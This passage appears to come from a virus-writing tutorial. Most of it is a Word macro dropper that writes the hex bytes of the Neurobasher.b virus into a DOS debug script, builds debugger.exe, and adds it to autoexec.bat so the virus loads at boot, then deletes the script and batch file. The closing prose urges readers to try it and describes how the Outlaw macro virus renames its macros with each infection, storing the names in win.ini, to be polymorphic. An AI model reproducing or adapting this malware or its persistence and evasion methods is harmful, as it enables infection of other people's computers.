Print #1, "E 0660 08 73 05 44 44 F9 EB EE 58 26 80 BF FD 01 F2 74"
Print #1, "E 0670 99 60 1E 06 06 1F 0E 07 8B F3 BF 8F 12 B9 00 01"
Print #1, "E 0680 2E 38 0E 99 05 75 18 F3 A5 80 3F EB 75 11 8B 47"
Print #1, "E 0690 13 BF F4 11 3D 40 0B 74 08 BF E9 11 3D 60 09 75"
Print #1, "E 06A0 74 0E 1F B8 1E 35 CD 21 53 06 B4 25 50 52 8B D7"
Print #1, "E 06B0 CD 21 5A 0E 07 BD 50 00 B1 0A BF 67 12 8B DF 8B"
Print #1, "E 06C0 C5 AB 8A C1 F6 D8 04 0B B4 02 AB E2 F2 B8 0A 05"
Print #1, "E 06D0 B9 01 50 E8 27 08 72 38 BB 8F 12 E8 1C 08 72 30"
Print #1, "E 06E0 41 B8 09 03 33 DB E8 14 08 72 25 89 0E 0C 02 89"
Print #1, "E 06F0 1E 0F 02 93 BB 8F 12 8A 47 01 97 8D 79 02 BE F8"
Print #1, "E 0700 01 B9 1E 00 F3 A4 C6 87 FD 01 F2 B1 01 E8 EA 07"
Print #1, "E 0710 58 1F 5A CD 21 07 1F 61 E9 38 FF B4 30 CD 21 3C"
Print #1, "E 0720 05 72 09 B4 52 CD 21 06 1F BF 9E 10 B9 01 00 2E"
Print #1, "E 0730 89 3E 93 14 2E 8C 1E 95 14 8B 05 3C 90 74 05 3D"
Print #1, "E 0740 03 EB 75 07 8B 7D 08 C4 3D EB 12 3D 2E 3A 75 05"
Print #1, "E 0750 41 1E 07 EB 08 3C EA 75 13 C4 7D 01 49 B0 9A FC"
Print #1, "E 0760 AA B8 E0 04 AB 33 C0 AB B0 90 F3 AA C3 B8 00 43"
Print #1, "E 0770 CD 2F 3C 80 75 1E B8 10 43 CD 2F 2E 89 1E 97 14"
Print #1, "E 0780 2E 8C 06 99 14 B4 10 8B D7 2E FF 1E 97 14 48 75"
Print #1, "E 0790 03 8B EB C3 B8 00 58 CD 21 50 B8 01 58 50 BB 80"
Print #1, "E 07A0 00 CD 21 B8 02 58 CD 21 B4 00 50 B8 03 58 50 B3"
Print #1, "E 07B0 01 CD 21 B4 48 8B DF CD 21 95 58 5B CD 21 58 5B"
Print #1, "E 07C0 CD 21 C3 E9 D6 00 2E C6 06 B4 04 D5 60 E8 74 06"
Print #1, "E 07D0 8B DA B9 80 00 80 FF FF 74 32 80 7F 01 3A 75 2C"
Print #1, "E 07E0 80 3F 2E 75 24 81 7F FE 4F 50 74 0E 81 7F FE 54"
Print #1, "E 07F0 41 74 07 81 7F FB 51 43 75 0F FE 07 B8 20 09 33"
Print #1, "E 0800 DB B1 F0 CD 10 93 E9 8D 00 43 E2 D4 1E 06 B4 52"
Print #1, "E 0810 CD 21 26 8E 5F FE BE 10 00 80 7C F4 80 B0 00 77"
Print #1, "E 0820 73 BF 4E 01 E8 46 FF 8B D5 80 FE A0 72 0C 4D 8E"
Print #1, "E 0830 DD 8B C7 C7 44 F1 08 00 EB 35 1E 80 3C 46 74 05"
Print #1, "E 0840 80 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B"
Print #1, "E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B"
Print #1, "E 0860 44 F1 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E"
Print #1, "E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04"
Print #1, "E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04"
Print #1, "E 0890 8C 06 F3 04 07 1F 2E A2 B4 04 61 CB 1E 68 01 C8"
Print #1, "E 08A0 1F C7 06 03 00 4E 01 1F EB 68 2E 8C 1E F7 05 0E"
Print #1, "E 08B0 1F 89 1E E2 05 BB E2 05 89 47 06 89 4F 0C 89 57"
Print #1, "E 08C0 12 89 77 09 89 7F 0F 89 6F 03 8C 47 19 C6 47 B7"
Print #1, "E 08D0 68 FF 06 A3 0E FC E8 78 06 8A C4 1E B9 0E 00 07"
Print #1, "E 08E0 BF 1A 06 F2 AE 75 28 D1 E1 03 D9 68 FF 05 FF 77"
Print #1, "E 08F0 46 BB 00 00 BD 00 00 B8 00 00 BE 00 00 B9 00 00"
Print #1, "E 0900 BF 00 00 BA 00 00 68 00 00 1F 68 00 00 07 C3 E8"
Print #1, "E 0910 0E 00 80 FC 6C 77 01 CB 83 C4 04 32 C0 CA 02 00"
Print #1, "E 0920 E8 CE FF 2E C6 06 99 05 00 C3 4B 4C 11 12 4E 4F"
Print #1, "E 0930 42 3F 3E 3D 32 44 25 40 C3 0B 39 0B 29 0B 2D 0B"
Print #1, "E 0940 68 06 1B 0B B5 0A 84 0A 67 09 49 09 B9 09 B9 09"
Print #1, "E 0950 1B 0B 4F 06 20 43 4F 20 00 2F 44 3A 46 20 00 3C"
Print #1, "E 0960 00 74 15 3C 01 75 10 B8 02 3D E8 A8 05 72 08 93"
Print #1, "E 0970 E8 60 05 B4 3E CD 21 C3 E8 B0 04 50 8B F2 BF 9B"
Print #1, "E 0980 14 0E 07 AC AA 0A C0 75 FA 0E 1F 59 80 FD 3D 75"
Print #1, "E 0990 2A C3 81 7D F3 53 4D 75 07 81 7D F9 48 4B 74 0E"
Print #1, "E 09A0 81 7D F4 43 48 75 D0 81 7D F6 4B 4C 75 C9 E8 6F"
Print #1, "E 09B0 FF 83 C4 06 B8 02 00 F9 CA 02 00 80 FD 4B 75 11"
Print #1, "E 09C0 C6 06 81 06 C3 81 7D F9 41 56 75 05 C6 06 81 06"
Print #1, "E 09D0 90 BE 49 06 81 7D F8 57 49 75 06 80 7D FA 4E 74"
Print #1, "E 09E0 11 BE 44 06 81 7D F6 42 53 75 39 81 7D F9 41 4E"
Print #1, "E 09F0 75 32 BF 8F 12 8B DF C6 05 FF 47 AC 0A C0 74 05"
Print #1, "E 0A00 AA FE 07 EB F6 8B 36 E2 05 8E 1E FB 05 8C C8 87"
Print #1, "E 0A10 44 04 50 8B C3 87 44 02 96 1F 46 AC AA 2E FF 07"
Print #1, "E 0A20 3C 0D 75 F7 0E 1F C6 06 B9 09 90 B4 2F CD 21 53"
Print #1, "E 0A30 06 B4 1A BA 04 12 CD 21 B8 24 35 CD 21 53 06 B4"
Print #1, "E 0A40 25 50 BA 8D 00 CD 21 B3 00 E8 3B 00 B4 4E B9 27"
Print #1, "E 0A50 00 E8 DF 00 72 24 BE 00 12 33 FF 80 7C 04 02 77"
Print #1, "E 0A60 16 52 B5 04 BA F5 03 B0 04 EE E2 FE B5 04 EE E2"
Print #1, "E 0A70 FE EC A8 40 5A 75 03 E8 1D 00 58 1F 5A CD 21 B4"
Print #1, "E 0A80 1A 1F 5A CD 21 B3 00 60 B8 02 FA BA 45 59 CD 16"
Print #1, "E 0A90 2E 88 0E 76 07 61 C3 39 7C 20 75 07 81 7C 1E 11"
Print #1, "E 0AA0 27 72 F3 B4 2A CD 21 8B 44 1C D1 E8 80 E9 BC 3A"
Print #1, "E 0AB0 E1 75 09 C1 E8 04 24 0F 3A C6 74 DA 8A 44 19 24"
Print #1, "E 0AC0 07 74 08 B8 01 43 33 C9 E8 68 00 B8 02 3D E8 62"
Print #1, "E 0AD0 00 72 53 93 B8 00 57 CD 21 51 52 B4 3F E8 68 01"
Print #1, "E 0AE0 72 38 80 7C 18 40 74 32 8B 04 02 C4 3C A7 75 2A"
Print #1, "E 0AF0 8B 44 04 48 33 D2 BD 00 02 F7 E5 03 44 02 13 D7"
Print #1, "E 0B00 39 44 1E 75 15 39 54 20 75 10 B0 02 E8 43 01 E8"
Print #1, "E 0B10 23 02 74 06 E8 14 03 E8 20 00 B8 01 57 5A 59 E8"
Print #1, "E 0B20 F3 03 B4 3E CD 21 B8 01 43 33 C9 8A 4C 19 80 F9"
Print #1, "E 0B30 20 74 06 BA 9B 14 E9 DC 03 C3 8B 44 0E A3 75 00"
Print #1, "E 0B40 8B 44 10 A3 71 00 8B 44 14 A3 81 00 8B 44 16 A3"
Print #1, "E 0B50 7B 00 8B 44 0C 80 FC FF 74 12 8B 44 04 99 B9 20"
Print #1, "E 0B60 00 F7 E1 2B 44 08 03 44 0C 05 10 00 A3 56 00 B4"
Print #1, "E 0B70 00 CD 1A 52 92 B4 F2 2A E0 F7 D8 89 44 22 58 8A"
Print #1, "E 0B80 CC 25 1F 00 C1 E0 04 A3 FE 08 8B 54 1E 83 E2 0F"
Print #1, "E 0B90 03 C2 A3 AD 0E 80 E1 1F 89 0E 0B 09 8B 44 1E 05"
Print #1, "E 0BA0 24 12 8B D0 0C 1F 2B C2 A3 E6 08 50 68 00 BE 07"
Print #1, "E 0BB0 33 FF 26 81 3D 20 07 74 02 58 C3 E8 0C 04 B4 40"
Print #1, "E 0BC0 B9 00 12 E8 90 00 3B C1 59 C7 05 20 07 0E 1F 75"
Print #1, "E 0BD0 E9 B6 13 E8 3D 03 B9 24 00 BA 00 12 E8 5F 03 E8"
Print #1, "E 0BE0 31 03 E8 59 03 E8 68 00 8B 44 1E 8B 54 20 50 52"
Print #1, "E 0BF0 05 24 12 13 D7 05 17 00 13 D7 F7 F5 40 89 44 04"
Print #1, "E 0C00 89 54 02 5A 58 F7 36 5A 08 2B 44 08 50 B9 60 00"
Print #1, "E 0C10 C1 E9 04 2B C1 89 44 16 58 48 05 04 00 89 44 0E"
Print #1, "E 0C20 03 16 FE 08 89 54 14 B8 00 16 8B 16 0B 09 C1 E2"
Print #1, "E 0C30 04 2B C2 89 44 10 81 44 0A 61 01 8B 44 0A 39 44"
Print #1, "E 0C40 0C 77 03 89 44 0C B4 40 B9 19 00 8B D6 E9 C5 02"
Print #1, "E 0C50 B0 00 B4 42 33 C9 99 EB F4 FC 0E 07 8B F2 BF 9B"
Print #1, "E 0C60 14 8B CF AC AA 3C 5C 75 02 8B CF 0A C0 75 F4 2E"
Print #1, "E 0C70 89 0E 79 09 E8 7A FC 83 C4 06 CD 21 72 43 50 E8"
Print #1, "E 0C80 83 00 72 3B 1E 8D 77 1E BF 9B 14 BA 9B 14 B9 0D"
Print #1, "E 0C90 00 0E 07 F3 A4 07 0E 1F 8B F3 B8 00 3D E8 75 02"
Print #1, "E 0CA0 72 1D 93 E8 85 01 E8 8C 00 9C B4 3E CD 21 9D 75"
Print #1, "E 0CB0 0E A1 61 12 26 89 44 1A A1 63 12 26 89 44 1C 58"
Print #1, "E 0CC0 F8 50 E8 5B FC 58 CA 02 00 90 83 C4 06 CD 21 3C"
Print #1, "E 0CD0 00 75 EE 50 E8 2E 00 72 E6 0E 07 8D 77 FE BF 43"
Print #1, "E 0CE0 12 8B D7 FC B9 08 00 E8 12 00 B0 2E AA 8D 77 06"
Print #1, "E 0CF0 B1 03 E8 07 00 B0 00 AA 1E 07 EB 9E AC 3C 20 74"
Print #1, "E 0D00 03 AA E2 F8 C3 B4 2F CD 21 06 1F 80 3F FF 75 03"
Print #1, "E 0D10 83 C3 07 2E 80 3E E9 05 12 77 03 83 C3 03 8A 47"
Print #1, "E 0D20 1A 24 1F 3C 1F 74 02 F9 C3 83 7F 1C 00 75 05 81"
Print #1, "E 0D30 7F 1A 11 27 C3 B8 00 44 CD 21 A8 80 75 55 0E 1F"
Print #1, "E 0D40 B0 01 E8 0D FF 72 4C A3 63 0A 89 16 66 0A 80 FB"
Print #1, "E 0D50 00 74 27 B8 02 42 B9 FF FF BA DC FF CD 21 88 1E"
Print #1, "E 0D60 40 0A B4 3F B9 24 00 BA 43 12 CD 21 E8 CF 01 B8"
Print #1, "E 0D70 00 42 BA 00 00 B9 00 00 CD 21 80 3E 43 12 5A 74"
Print #1, "E 0D80 07 80 3E 43 12 4D 75 0B 50 A1 65 12 F7 D8 02 C4"
Print #1, "E 0D90 3C F2 58 C3 3C 02 75 FB E8 9A FF 75 F6 83 C4 06"
Print #1, "E 0DA0 E8 4E FB 51 B0 00 2E 8B 0E 63 12 2E 8B 16 61 12"
Print #1, "E 0DB0 2E 03 16 F4 05 83 D1 00 2E 03 0E EE 05 CD 21 E8"
Print #1, "E 0DC0 61 FB 59 EB 63 51 E8 6C FF 5D 75 C7 83 C4 06 BE"
Print #1, "E 0DD0 43 12 2B 44 1E 83 DA 00 2B 54 20 78 08 E8 40 FB"
Print #1, "E 0DE0 2B C0 F8 EB 43 03 C5 83 D2 00 75 02 2B E8 55 E8"
Print #1, "E 0DF0 FF FA 59 CD 21 9C 50 72 2A 1E 07 8B FA 0E 1F BE"
Print #1, "E 0E00 43 12 83 3E 66 0A 00 75 1A A1 63 0A 3D 18 00 73"
Print #1, "E 0E10 12 03 F0 03 C8 83 F9 18 76 06 2D 18 00 F7 D8 91"
Print #1, "E 0E20 FC F3 A4 E8 FA FA 58 9D CA 02 00 2E C6 06 40 0A"
Print #1, "E 0E30 00 2E C7 06 65 12 00 00 C3 3C 52 75 06 2E C6 06"
Print #1, "E 0E40 B9 09 C3 C3 80 FC 25 75 78 8B F2 81 3C CD 30 75"
Print #1, "E 0E50 13 2E C5 16 8F 14 1E 07 8B C2 B7 13 93 CD 2F A1"
Print #1, "E 0E60 FF FF EB FE 8B 04 3C EB 75 11 81 7C 07 FA 9C 75"
Print #1, "E 0E70 0A 81 7C 09 FC 53 75 03 C6 04 A8 3D FA 9C 75 0B"
Print #1, "E 0E80 81 7C 04 F6 06 75 04 C6 44 09 EB 3D 2E 83 75 13"
Print #1, "E 0E90 81 7C 09 50 55 75 0C 80 BC 6E 01 E8 75 05 C6 84"
Print #1, "E 0EA0 6E 01 C3 3D CD 30 75 02 EB FE 3D FB 2E 75 13 81"
Print #1, "E 0EB0 7C 07 75 03 75 0B 81 7C 0D FC FA 75 04 C6 44 08"
Print #1, "E 0EC0 00 C3 3D 9C EB 75 FA 81 7C 02 00 80 75 F3 C6 44"
Print #1, "E 0ED0 07 00 C3 E8 5F FE 75 E9 E8 75 FD BE 43 12 E8 65"
Print #1, "E 0EE0 FD 72 14 B8 00 42 8B 0E 63 12 8B 16 61 12 CD 21"
Print #1, "E 0EF0 B4 40 33 C9 E8 1E 00 E9 75 FE B8 01 03 53 33 DB"
Print #1, "E 0F00 E8 84 FB 5B FA 9C 2E FF 1E 8F 14 53 9C E8 75 FB"
Print #1, "E 0F10 9D 5B C3 B4 40 FA 9C 2E FF 1E 93 14 C3 E8 03 00"
Print #1, "E 0F20 E8 DA FF 60 8B F3 8B FB 8A CE BA AD DE D3 E2 B9"
Print #1, "E 0F30 FF 00 26 AD 33 C2 83 C2 7F AB E2 F6 61 C3 60 8B"
Print #1, "E 0F40 F2 8A 5C 23 49 AC 32 C3 02 D9 88 44 FF E2 F6 61"
Print #1, "E 0F50 C3 C3 60 B9 01 00 E2 FE 2E FE 06 44 0C 75 1E B8"
Print #1, "E 0F60 03 00 CD 10 B4 02 B7 00 BA 03 0C CD 10 BE 6F 0C"
Print #1, "E 0F70 2E AC 34 F5 CD 29 0A C0 75 F6 98 CD 16 61 C3 C9"
Print #1, "E 0F80 BD B4 A3 BA B6 CB D5 97 8C D5 BB 90 80 87 9A 97"
Print #1, "E 0F90 94 86 9D 90 87 D2 CC C6 DA B2 90 87 98 94 9B 8C"
Print #1, "E 0FA0 D5 31 B2 A7 BC A5 A5 B0 B1 31 B7 AC 31 B3 B0 B4"
Print #1, "E 0FB0 A7 31 A0 BB A1 BC B9 31 B1 B0 B4 A1 BD 31 A0 A6"
Print #1, "E 0FC0 31 B1 BA 31 A5 B4 A7 A1 31 F5 60 33 F6 B9 DC 14"
Print #1, "E 0FD0 F3 A4 BE 9A 0E 2B FF 33 C0 A3 2E 0E C6 06 37 0E"
Print #1, "E 0FE0 35 A3 38 0E C7 44 99 90 90 C6 44 98 05 B4 2C CD"
Print #1, "E 0FF0 21 89 4C 03 89 54 05 B4 2A CD 21 89 0C 88 44 02"
Print #1, "E 1000 52 B4 00 CD 1A 87 E9 59 87 F3 FC 8B C1 03 C2 33"
Print #1, "E 1010 C5 89 47 59 8B C2 0B C5 D1 C0 F7 D8 89 47 6F 89"
Print #1, "E 1020 47 94 68 9B 11 68 63 11 B8 42 11 FF D0 58 FF D0"
Print #1, "E 1030 58 FF D0 A1 13 0D 87 06 16 0D 87 06 19 0D F6 C1"
Print #1, "E 1040 01 74 04 87 06 16 0D A3 13 0D B0 0F E8 81 03 89"
Print #1, "E 1050 7F 0B 8B F1 83 E6 07 D1 E6 83 FE 06 72 11 83 FE"
Print #1, "E 1060 08 77 0C B0 F8 F6 C5 02 74 01 40 AA 88 47 96 F6"
Print #1, "E 1070 47 09 03 75 03 B0 2E AA F6 47 03 03 75 0B 83 C6"
Print #1, "E 1080 10 83 FE 18 77 03 B0 81 AA FF 50 A8 B8 AF 11 BE"
Print #1, "E 1090 C0 11 F6 C2 01 75 01 96 56 FF D0 58 FF D0 B0 0F"
Print #1, "E 10A0 E8 2D 03 8B 77 07 83 E6 03 D1 E6 FF 50 D8 E8 1D"
Print #1, "E 10B0 03 8A 47 05 25 03 00 96 81 C6 8A 0E A4 89 7F 0D"
Print #1, "E 10C0 AA E8 0A 03 83 FD 13 72 0F F6 47 03 03 75 09 B8"
Print #1, "E 10D0 33 C9 AB B0 E3 AA EB 0B 8B 77 06 83 E6 03 81 C6"
Print #1, "E 10E0 8E 0E A4 8B 47 0B 2B C7 48 26 80 7D FF E9 74 03"
Print #1, "E 10F0 AA EB 02 48 AB 57 B0 68 AA 8B 47 13 05 40 00 AB"
Print #1, "E 1100 B0 C3 AA 5F 8B 47 0D 8B F0 F7 D8 03 C7 48 26 88"
Print #1, "E 1110 04 B8 42 12 8B 77 11 2B C7 03 47 13 26 89 04 8B"
Print #1, "E 1120 77 0F 8B C7 03 47 13 B9 05 00 06 1F 80 3C FE 75"
Print #1, "E 1130 02 88 04 80 3C FF 75 02 88 24 46 E2 EF B8 82 76"
Print #1, "E 1140 F8 29 05 90 90 47 47 35 00 00 81 FF 01 12 72 F0"
Print #1, "E 1150 61 C3 69 0F 7C 0F 86 0F 8A 0F 94 0F 98 0F A3 0F"
Print #1, "E 1160 AE 0F FF 0E 2A 0F 39 0F 3D 0F 46 0F 98 0F A3 0F"
Print #1, "E 1170 AE 0F E1 0E E1 0E FA 0E 0D 0F CB 0F EC 0F F5 0F"
Print #1, "E 1180 13 10 28 10 35 10 47 10 56 10 6E 10 79 10 80 10"
Print #1, "E 1190 8E 10 8B C6 89 F0 8D 04 56 58 74 77 73 74 EB 75"
Print #1, "E 11A0 E9 72 62 11 50 11 59 11 59 11 00 00 00 00 00 00"
Print #1, "E 11B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06"
Print #1, "E 11C0 07 03 03 04 05 07 07 01 02 05 08 10 28 74 7D 5F"
Print #1, "E 11D0 5F EC 10 E9 10 34 11 ED 10 13 11 F5 10 F9 10 0B"
Print #1, "E 11E0 11 17 11 23 11 F1 10 FE 10 3A 11 3E 11 2B 11 02"
Print #1, "E 11F0 11 B8 C0 05 F6 C6 01 74 03 B8 E8 2D E8 5B 00 88"
Print #1, "E 1200 67 9D B8 CC 45 AB 89 47 9E C3 B8 F0 35 EB ED B0"
Print #1, "E 1210 30 E8 5B 00 C6 47 97 31 B8 82 76 AB C3 4F B0 D1"
Print #1, "E 1220 AA 88 47 9D B8 C0 C0 F6 C6 01 74 03 B8 C8 C8 E8"
Print #1, "E 1230 28 00 B0 90 86 C4 89 47 9E C3 B0 00 E8 30 00 34"
Print #1, "E 1240 28 24 F8 40 88 47 97 EB CF B0 28 EB EF B0 10 E8"
Print #1, "E 1250 1D 00 34 08 EB EB B0 18 EB F5 8B 77 03 83 E6 03"
Print #1, "E 1260 02 40 1C AA C3 8B F2 83 E6 03 02 40 15 AA C3 8B"
Print #1, "E 1270 F2 83 E6 03 02 40 19 AA C3 B0 31 AA 88 47 97 B0"
Print #1, "E 1280 00 8B 77 03 83 E6 03 02 40 1F EB E3 B0 01 AA 34"
Print #1, "E 1290 28 88 47 97 EB E9 B0 29 EB F4 B0 11 AA 34 08 88"
Print #1, "E 12A0 47 97 EB DB B0 19 EB F4 B8 F7 15 AA 89 47 97 B0"
Print #1, "E 12B0 10 EB BC B8 F7 1D AA 89 47 97 B0 18 EB B1 B0 D1"
Print #1, "E 12C0 AA 88 47 97 B0 00 F7 C5 01 00 74 02 34 08 E8 9E"
Print #1, "E 12D0 FF 24 08 0C 05 34 08 88 47 98 C3 F6 C1 05 74 0E"
Print #1, "E 12E0 B0 40 E8 80 FF 50 B0 0F E8 E5 00 58 AA C3 B0 FF"
Print #1, "E 12F0 AA B0 C0 E8 6F FF 26 8B 45 FE AB C3 B4 C0 E8 13"
Print #1, "E 1300 00 B0 02 EB 07 B4 E8 E8 0A 00 B0 FE F6 C6 03 74"
Print #1, "E 1310 44 98 AB C3 B0 83 F6 C6 03 74 02 34 02 AA 8A C4"
Print #1, "E 1320 E9 42 FF B0 8D AA 8B F2 83 E6 03 8A 40 23 F6 C6"
Print #1, "E 1330 03 74 02 04 40 AA EB C9 B0 81 AA B0 F8 E8 25 FF"
Print #1, "E 1340 89 7F 11 AB C3 B0 B8 AA E8 F5 FF B0 2B AA B0 C0"
Print #1, "E 1350 E8 12 FF B0 F5 AA C3 B0 B8 AA E8 E3 FF B8 F7 D8"
Print #1, "E 1360 AB B0 03 AA EB E8 8B C2 24 03 75 CC 8B 77 09 83"
Print #1, "E 1370 E6 03 D1 E6 81 C6 82 0E A5 B0 3D AA EB C2 B0 B8"
Print #1, "E 1380 02 46 02 AA 8B 46 04 AB C3 B0 C7 AA B0 C0 EB F0"
Print #1, "E 1390 B0 8D AA 8A 46 02 98 C1 E0 03 04 06 EB E5 80 7E"
Print #1, "E 13A0 02 04 77 1C B0 B0 8A 66 04 02 46 02 96 B0 B4 8A"
Print #1, "E 13B0 66 05 02 46 02 F7 C7 01 00 75 01 96 AB 96 AB C3"
Print #1, "E 13C0 B0 68 AA 8B 46 04 AB B0 58 02 46 02 AA C3 B0 09"
Print #1, "E 13D0 98 96 E8 0D 00 25 0F 00 3B C6 77 F6 D1 E0 96 FF"
Print #1, "E 13E0 60 27 53 1E 0E 1F BB 97 04 8B 07 1F 43 03 DF 80"
Print #1, "E 13F0 E7 1F 2E 89 1E D7 10 5B C3 B0 FC AA C3 B0 FD AA"
Print #1, "E 1400 C3 B0 90 AA C3 B0 FA AA C3 B0 FB AA C3 C3 B0 98"
Print #1, "E 1410 AA C3 B8 F8 73 AB B8 01 EA AB C3 B0 B0 AA E8 C1"
Print #1, "E 1420 FF AA C3 B0 B4 EB F6 B0 8B AA E8 B5 FF 24 07 04"
Print #1, "E 1430 C0 AA C3 B0 B8 AA E8 A9 FF AB C3 B8 B4 4D AB B8"
Print #1, "E 1440 CD 21 AB C3 B8 8D 06 AB EB EC B0 25 EB E7 B0 0D"
Print #1, "E 1450 EB E3 E8 79 FF 8B 77 09 83 E6 03 D1 E6 FF 60 F8"
Print #1, "E 1460 B8 8C C8 AB B8 8E D8 AB C3 B0 0E AA E8 5F FF B0"
Print #1, "E 1470 1F AA C3 8A C1 24 07 3C 04 77 54 F6 47 03 03 74"
Print #1, "E 1480 4E E8 4A FF 8B 47 6F 89 47 94 50 8B 77 03 83 E6"
Print #1, "E 1490 03 8A 40 1C 8B 77 03 98 50 C1 EE 03 83 E6 03 55"
Print #1, "E 14A0 8B EC D1 E6 FF 50 E0 5D 58 58 C3 E8 20 FF 89 7F"
Print #1, "E 14B0 0F 6A FE 8B F2 83 E6 03 8A 40 15 8B F2 EB D8 B0"
Print #1, "E 14C0 0F E8 0C FF 8B 77 04 83 E6 03 D1 E6 FF 50 D0 C3"
Print #1, "E 14D0 8A C1 24 07 3C 04 77 F7 8A C5 25 03 00 D1 E0 96"
Print #1, "E 14E0 74 ED F6 47 03 03 74 E7 56 B0 0F E8 E2 FE 5E B0"
Print #1, "E 14F0 81 AA FF 60 C8 E9 11 F4 11 DF 02 25 02 0F 1B FF"
Print #1, "E 1500 54 F6 0F 08 DF 02 25 02 12 1B FF 6C F6 0F 08 00"
Print #1, "E 1510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17E0 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "RCX"
Print #1, "16EC"
Print #1, "W"
Print #1, "Q"
Print #1, ""
Close #1

'Create a file called c:\dos\exec.bat for putting in all
'the things that are behind "print #1" till "close #1"
'is found.

Open "c:\dos\exec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "debug < script.scr>nul"
Print #1, "rem debugger.com"
Print #1, "echo @c:\dos\debugger.exe>>c:\autoexec.bat"
Print #1, "del c:\dos\script.scr"
Print #1, "del c:\dos\exec.bat"
Close #1

SetAttr "c:\autoexec.bat", 0    'Set the atribute of c:\autoexec.bat...
                                'to nothing.

ChDir "C:\DOS"
Shell "EXEC.BAT", 0

ChDir "C:"

NoDropper:
----------------------------------------------------------------

The above is a piece of a Nemesis macro and it opens debug to create a file (debugger.exe) containing the Neurobasher.b virus. The numbers are the hex codes of the Neurobasher.b virus. Then a file called "c:\dos\exec.bat" is created and it contains everything behind the "print #1" until "close #1" is found. After that's done the virus will change the attributes of "c:\autoexec.bat" to editable (not readonly).

And finally the virus will change to the directory "c:\dos" and executes the "exec.bat" file that was created earlier, after that the virus will change to the "c:" directory. So the next time you start your computer the Neurobasher.b virus will be loaded. Have fun trying this out ;-)

Polymorphism in macro virii

You maybe already heared something about polymorphism in macro virii. The first macro virus that uses this technique was the Outlaw virus. The way it is polymorphic is that it changes it's macro names every infection and stores them (the macro names) in win.ini. If Word is restarted, it reads the names of the macro from win.ini. To use them in your macros you need to read them and set them into strings like name1$, name2$, etc. The names that are generated are just a charachter + number, something like A326 or maybe RT898763. The reason that it uses characters plus numbers is because Word can only use macros that begin with a character. After the character there can be numbers too. That's done because of the fact that numbers are easy to generate in Word. Just use some random function to generate a random number. But if Word generates a number there is always an open space before the number because that is used for making the number negative. 